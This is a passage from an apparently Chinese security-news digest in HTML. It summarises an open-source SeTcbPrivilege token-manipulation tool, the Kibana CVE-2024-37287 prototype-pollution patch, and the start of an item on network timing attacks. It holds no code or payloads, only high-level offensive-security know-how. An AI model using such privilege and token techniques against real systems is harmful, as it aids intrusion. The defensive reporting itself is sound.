	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">SeTcbPrivilege 漏洞研究工具开源</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">SeTcbPrivilege 漏洞工具开源</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZm3z7q1TPvLib48LK4zo4icTPn9UObBUia1KgI8wwYiaf2RbZpCS9DsJ5vFib31rKYlS24MawuvNYC8tVg/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZm3z7q1TPvLib48LK4zo4icTPn9UObBUia1KgI8wwYiaf2RbZpCS9DsJ5vFib31rKYlS24MawuvNYC8tVg/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=2855188251542141"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">SeTcbPrivilege是一个多功能特权，可以用于各种令牌操作，包括但不限于会话ID、源、强制策略和完整性级别的修改。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">使用SeTcbPrivilege可以创建特殊的登录令牌和新的SID映射，这通常需要LSA家族API。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">在创建具有特定令牌的进程时，<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">CreateProcessAsUser</code>和<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">CreateProcessWithTokenW</code> API是首选的方法。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">作者提供的工具<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">CreateGUISessionProcess</code>、<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">BackgroundShell</code>、<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">DesktopShell</code>、<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">S4ULogonShell</code>、<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">ServiceShell</code>和<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">VirtualShell</code>，都是用来演示特权和令牌操作的实际应用。</section></li></ul>
	<br/>
	<p>🏷️: SeTcbPrivilege, 令牌操作, 会话ID, 强制策略, 完整性级别</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x02
			 Kibana发布紧急安全补丁修复严重漏洞</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">Elastic团队发布了一个关键的安全更新，用于修复Kibana中的严重漏洞CVE-2024-37287，该漏洞可能导致任意代码执行。</span>
		</p>
	</blockquote>


	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">紧急修复！Kibana 严重安全漏洞 CVE-2024-37287 (CVSS 9.9)</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">紧急修复！Kibana严重漏洞CVE-2024-37287</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZm3z7q1TPvLib48LK4zo4icTPwy1pzUHqpmribBOMtklUlKKGZvZ3vMAtZTEBWKMMKmYT0F8oQ9eImGw/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZm3z7q1TPvLib48LK4zo4icTPwy1pzUHqpmribBOMtklUlKKGZvZ3vMAtZTEBWKMMKmYT0F8oQ9eImGw/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=5122811588142814"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">CVE-2024-37287漏洞危害性极高：该漏洞被评为CVSS评分9.9，表明其对Kibana用户的威胁潜力非常大。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">原型污染漏洞可能导致任意代码执行：攻击者可以通过访问机器学习和警报连接器功能，以及对内部机器学习索引的写入访问权限，利用原型污染漏洞执行任意代码。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">多种部署方式受到影响：包括自管理安装、Docker镜像、Elastic Cloud、ECE和ECK等部署方式都可能受到此漏洞的影响。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">立即升级至最新版本的重要性：用户应立即升级到Kibana 8.14.2或7.17.23版本，以保护自己免受潜在的攻击。</section></li></ul>
	<br/>
	<p>🏷️: Kibana, 漏洞, 安全更新, 代码执行, Elastic</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x03
			 揭秘有效的网络定时攻击</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">本文介绍了如何利用网络定时攻击来揭露服务器的隐藏信息，包括错误配置、盲注入漏洞、隐藏路由以及广泛的隐藏攻击面。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="1" data-w="112" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=af529517&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZm3z7q1TPvLib48LK4zo4icTPE2jtNDxIWNZkkcmIdO8iapYJjicslfta0pnr1bMQUrlyUt75fFw0y4hg%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.48936170212765956" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="940" src="https://wechat2rss.xlab.app/img-proxy/?k=114a52ab&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZm3z7q1TPvLib48LK4zo4icTPytFzbrkRZqvmxia3JmIJOdwCiaGo3QNEwLq89PBtLtcJlMx3wzQLe6sg%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.4166666666666667" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=032bfffa&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZm3z7q1TPvLib48LK4zo4icTPx8HhhzGosbb3MGoBkEUA761Z0dBU8uvicJVmpSgP6YWYJCBEbWeuthA%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
